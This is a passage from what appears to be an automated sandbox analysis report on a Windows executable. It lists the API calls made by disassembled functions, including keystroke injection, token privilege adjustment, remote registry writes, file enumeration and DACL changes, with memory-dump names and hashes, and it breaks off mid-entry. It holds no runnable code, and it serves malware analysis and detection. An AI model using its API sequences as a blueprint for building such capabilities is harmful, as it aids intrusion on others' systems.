                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F4D6BF
                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F4D6C7
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F4D6CF
                                                              • SetForegroundWindow.USER32(?), ref: 00F4D6D2
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F4D6E7
                                                              • keybd_event.USER32(00000012,00000000), ref: 00F4D6F2
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F4D6FC
                                                              • keybd_event.USER32(00000012,00000000), ref: 00F4D701
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F4D70A
                                                              • keybd_event.USER32(00000012,00000000), ref: 00F4D70F
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F4D719
                                                              • keybd_event.USER32(00000012,00000000), ref: 00F4D71E
                                                              • SetForegroundWindow.USER32(?), ref: 00F4D721
                                                              • AttachThreadInput.USER32(?,?,00000000), ref: 00F4D748
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: c778203c253167b7dbafe07de288577e31d1329bf5a4d45875ce50c4f1a105ab
                                                              • Instruction ID: 1b1e1e992acaaff114f67d261f9c0f5b5a9c020208b481606371f82b51af4743
                                                              • Opcode Fuzzy Hash: c778203c253167b7dbafe07de288577e31d1329bf5a4d45875ce50c4f1a105ab
                                                              • Instruction Fuzzy Hash: EA319271A4031CBBEB202BA19C89F7F3E6CEB44B60F114026FA04EA1D1C6B05850BAA1
                                                              APIs
                                                                • Part of subcall function 00F687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6882B
                                                                • Part of subcall function 00F687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F68858
                                                                • Part of subcall function 00F687E1: GetLastError.KERNEL32 ref: 00F68865
                                                              • _memset.LIBCMT ref: 00F68353
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F683A5
                                                              • CloseHandle.KERNEL32(?), ref: 00F683B6
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F683CD
                                                              • GetProcessWindowStation.USER32 ref: 00F683E6
                                                              • SetProcessWindowStation.USER32(00000000), ref: 00F683F0
                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F6840A
                                                                • Part of subcall function 00F681CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F68309), ref: 00F681E0
                                                                • Part of subcall function 00F681CB: CloseHandle.KERNEL32(?,?,00F68309), ref: 00F681F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                              • String ID: $default$winsta0
                                                              • API String ID: 2063423040-1027155976
                                                              • Opcode ID: de3559bfa1557a1321b4e8e2b4dc7fdb555aa5c8f31ed7835612f9925ec12420
                                                              • Instruction ID: ee9a4fb3f6c198941262542c42995bd79185f5267a39d4aeb18c17cc310d833c
                                                              • Opcode Fuzzy Hash: de3559bfa1557a1321b4e8e2b4dc7fdb555aa5c8f31ed7835612f9925ec12420
                                                              • Instruction Fuzzy Hash: 2D815B71D0020DAFDF119FA4CC45AEE7B78FF043A4F18426AF915A6261DB358E16EB20
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00F7C78D
                                                              • FindClose.KERNEL32(00000000), ref: 00F7C7E1
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F7C806
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F7C81D
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F7C844
                                                              • __swprintf.LIBCMT ref: 00F7C890
                                                              • __swprintf.LIBCMT ref: 00F7C8D3
                                                                • Part of subcall function 00F17DE1: _memmove.LIBCMT ref: 00F17E22
                                                              • __swprintf.LIBCMT ref: 00F7C927
                                                                • Part of subcall function 00F33698: __woutput_l.LIBCMT ref: 00F336F1
                                                              • __swprintf.LIBCMT ref: 00F7C975
                                                                • Part of subcall function 00F33698: __flsbuf.LIBCMT ref: 00F33713
                                                                • Part of subcall function 00F33698: __flsbuf.LIBCMT ref: 00F3372B
                                                              • __swprintf.LIBCMT ref: 00F7C9C4
                                                              • __swprintf.LIBCMT ref: 00F7CA13
                                                              • __swprintf.LIBCMT ref: 00F7CA62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 3953360268-2428617273
                                                              • Opcode ID: 048e075a6a64979604da0d44323e23ef8223a590d0222a919f37461573ff101a
                                                              • Instruction ID: b83bd1042953f75058ec65cdd0c5f458ae1467deb3bebfbe442fd164748ab49e
                                                              • Opcode Fuzzy Hash: 048e075a6a64979604da0d44323e23ef8223a590d0222a919f37461573ff101a
                                                              • Instruction Fuzzy Hash: 65A13FB1408344ABC700EFA4CD96DEFB7ECAF94700F40491EF585C6191EA78DA49DBA2
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00F7EFB6
                                                              • _wcscmp.LIBCMT ref: 00F7EFCB
                                                              • _wcscmp.LIBCMT ref: 00F7EFE2
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00F7EFF4
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00F7F00E
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00F7F026
                                                              • FindClose.KERNEL32(00000000), ref: 00F7F031
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00F7F04D
                                                              • _wcscmp.LIBCMT ref: 00F7F074
                                                              • _wcscmp.LIBCMT ref: 00F7F08B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7F09D
                                                              • SetCurrentDirectoryW.KERNEL32(00FC8920), ref: 00F7F0BB
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7F0C5
                                                              • FindClose.KERNEL32(00000000), ref: 00F7F0D2
                                                              • FindClose.KERNEL32(00000000), ref: 00F7F0E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 88289d3df00298b43048a7b34115a2b5aa61075c9d094668c4231d135f873bf2
                                                              • Instruction ID: 441d105722461087f184302b4004c4c9b081ab133389c4ab78cfa382ab01e334
                                                              • Opcode Fuzzy Hash: 88289d3df00298b43048a7b34115a2b5aa61075c9d094668c4231d135f873bf2
                                                              • Instruction Fuzzy Hash: B43180329012196BDB14DBB4EC49FEE77AC9F48360F148177E809D2191DB74DA48EA62
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F90953
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F9F910,00000000,?,00000000,?,?), ref: 00F909C1
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F90A09
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F90A92
                                                              • RegCloseKey.ADVAPI32(?), ref: 00F90DB2
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F90DBF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              • API String ID: 536824911-966354055
                                                              • Opcode ID: 77b81c4096747bf778bc25e0276a964f9184f3e792e173267ebdbb183625b1b8
                                                              • Instruction ID: 5a0c571a63dc5e105faa1e7b046f839f717d3e1e2903c19026118b31d9318f7f
                                                              • Opcode Fuzzy Hash: 77b81c4096747bf778bc25e0276a964f9184f3e792e173267ebdbb183625b1b8
                                                              • Instruction Fuzzy Hash: 2F02AD756046019FDB14EF24C851E6AB7E5FF89320F04886DF88A9B362CB74ED45EB81
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00F7F113
                                                              • _wcscmp.LIBCMT ref: 00F7F128
                                                              • _wcscmp.LIBCMT ref: 00F7F13F
                                                                • Part of subcall function 00F74385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F743A0
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00F7F16E
                                                              • FindClose.KERNEL32(00000000), ref: 00F7F179
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00F7F195
                                                              • _wcscmp.LIBCMT ref: 00F7F1BC
                                                              • _wcscmp.LIBCMT ref: 00F7F1D3
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7F1E5
                                                              • SetCurrentDirectoryW.KERNEL32(00FC8920), ref: 00F7F203
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7F20D
                                                              • FindClose.KERNEL32(00000000), ref: 00F7F21A
                                                              • FindClose.KERNEL32(00000000), ref: 00F7F22C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: 53a6e2207a68c69227d82dd2c838c218fa83c7a7fca320b632518888eb97e57d
                                                              • Instruction ID: 6b3477ec2d8b440ab1df96a1575e7b79d8727af922a3cacff51c3c5aefeb112d
                                                              • Opcode Fuzzy Hash: 53a6e2207a68c69227d82dd2c838c218fa83c7a7fca320b632518888eb97e57d
                                                              • Instruction Fuzzy Hash: 9B31C43690021EAADB209F64EC49FEE77AC9F45370F144177E808E2091DB74DE49EA56
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F7A20F
                                                              • __swprintf.LIBCMT ref: 00F7A231
                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F7A26E
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F7A293
                                                              • _memset.LIBCMT ref: 00F7A2B2
                                                              • _wcsncpy.LIBCMT ref: 00F7A2EE
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F7A323
                                                              • CloseHandle.KERNEL32(00000000), ref: 00F7A32E
                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00F7A337
                                                              • CloseHandle.KERNEL32(00000000), ref: 00F7A341
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                              • String ID: :$\$\??\%s
                                                              • API String ID: 2733774712-3457252023
                                                              • Opcode ID: 83ab00cf31c516f7faca8eb3afc6e97debe3fd8d7e06d085df7cdf360c002c8f
                                                              • Instruction ID: 0b48a6bb35d1ddfd423e0cea36277b2c44c31fe23f8f343977ec093fd402381e
                                                              • Opcode Fuzzy Hash: 83ab00cf31c516f7faca8eb3afc6e97debe3fd8d7e06d085df7cdf360c002c8f
                                                              • Instruction Fuzzy Hash: E531D2B1904109ABDB20DFA0DC49FEF37BCEF88750F1040B6F908D2161EB7596849B25
                                                              APIs
                                                                • Part of subcall function 00F68202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F6821E
                                                                • Part of subcall function 00F68202: GetLastError.KERNEL32(?,00F67CE2,?,?,?), ref: 00F68228
                                                                • Part of subcall function 00F68202: GetProcessHeap.KERNEL32(00000008,?,?,00F67CE2,?,?,?), ref: 00F68237
                                                                • Part of subcall function 00F68202: HeapAlloc.KERNEL32(00000000,?,00F67CE2,?,?,?), ref: 00F6823E
                                                                • Part of subcall function 00F68202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F68255
                                                                • Part of subcall function 00F6829F: GetProcessHeap.KERNEL32(00000008,00F67CF8,00000000,00000000,?,00F67CF8,?), ref: 00F682AB
                                                                • Part of subcall function 00F6829F: HeapAlloc.KERNEL32(00000000,?,00F67CF8,?), ref: 00F682B2
                                                                • Part of subcall function 00F6829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F67CF8,?), ref: 00F682C3
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F67D13
                                                              • _memset.LIBCMT ref: 00F67D28
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F67D47
                                                              • GetLengthSid.ADVAPI32(?), ref: 00F67D58
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00F67D95
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F67DB1
                                                              • GetLengthSid.ADVAPI32(?), ref: 00F67DCE
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F67DDD
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00F67DE4
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F67E05
                                                              • CopySid.ADVAPI32(00000000), ref: 00F67E0C
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F67E3D
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F67E63
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F67E77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: cac426bdf403be5ca3dd0dee4eb82f4f2ff3a235946b3cf7f5622bb0da407e8f
                                                              • Instruction ID: ffce163f766c2680a71821f06e5ace368e4d0731777ff5fdebad255eafe7e15b
                                                              • Opcode Fuzzy Hash: cac426bdf403be5ca3dd0dee4eb82f4f2ff3a235946b3cf7f5622bb0da407e8f
                                                              • Instruction Fuzzy Hash: 89616C71900209AFDF00DFA0DC44AEEBB79FF04314F04826AF815E6291DB359E19EB60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                              • API String ID: 0-4052911093
                                                              • Opcode ID: cbcf4ac312d9912ae8efc1abd9f5bd60bc15581cb0bf33bddc70948a203396a5
                                                              • Instruction ID: 0715fcfe2e2398b12a8eac57014bfd40801414617a8704e9280ebde33411629f
                                                              • Opcode Fuzzy Hash: cbcf4ac312d9912ae8efc1abd9f5bd60bc15581cb0bf33bddc70948a203396a5
                                                              • Instruction Fuzzy Hash: F7728271E00229DBDF14DF59D8817AEB7B5FF44320F18816AE806EB291DB349D81EB90
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00F70097
                                                              • SetKeyboardState.USER32(?), ref: 00F70102
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00F70122
                                                              • GetKeyState.USER32(000000A0), ref: 00F70139
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00F70168
                                                              • GetKeyState.USER32(000000A1), ref: 00F70179
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00F701A5
                                                              • GetKeyState.USER32(00000011), ref: 00F701B3
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00F701DC
                                                              • GetKeyState.USER32(00000012), ref: 00F701EA
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00F70213
                                                              • GetKeyState.USER32(0000005B), ref: 00F70221
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 9c13b97358795105a2f0f32d0e621d8a840da36678784487386e172ce4284820
                                                              • Instruction ID: adb4a3c461d50d1d3b54bd00d8fe2830b8d9db67e5bd303f8469e52d89c71f55
                                                              • Opcode Fuzzy Hash: 9c13b97358795105a2f0f32d0e621d8a840da36678784487386e172ce4284820
                                                              • Instruction Fuzzy Hash: 5651DD20D0478899FB35D76088547AABFB49F013A0F48C59FD5C9561C3DEA49B8CE763
                                                              APIs
                                                                • Part of subcall function 00F90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8FDAD,?,?), ref: 00F90E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F904AC
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F9054B
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F905E3
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F90822
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F9082F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: 45909174c75a084cab81a36e705470e175c7ed7fefc77d06c0f97e103a542819
                                                              • Instruction ID: 2096edaf47b62fb2b6ce38b56edaff41a9b0b0620c6f4597fa92d14afc1a71a5
                                                              • Opcode Fuzzy Hash: 45909174c75a084cab81a36e705470e175c7ed7fefc77d06c0f97e103a542819
                                                              • Instruction Fuzzy Hash: 02E16031604214AFDB14DF24CC91E6ABBE8EF89324F04856DF849D7261DB34ED45DB92
                                                              APIs
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                              • CoInitialize.OLE32 ref: 00F88403
                                                              • CoUninitialize.OLE32 ref: 00F8840E
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00FA2BEC,?), ref: 00F8846E
                                                              • IIDFromString.OLE32(?,?), ref: 00F884E1
                                                              • VariantInit.OLEAUT32(?), ref: 00F8857B
                                                              • VariantClear.OLEAUT32(?), ref: 00F885DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 834269672-1287834457
                                                              • Opcode ID: d3e5349aee790b3608b458f8759fd8c0967ee66abb70d8d96c9175df8505b7da
                                                              • Instruction ID: 5b0d09e1d94ad8911c6e039bab5117b702ba373fd17ca6cc9f03a5c932adb2cd
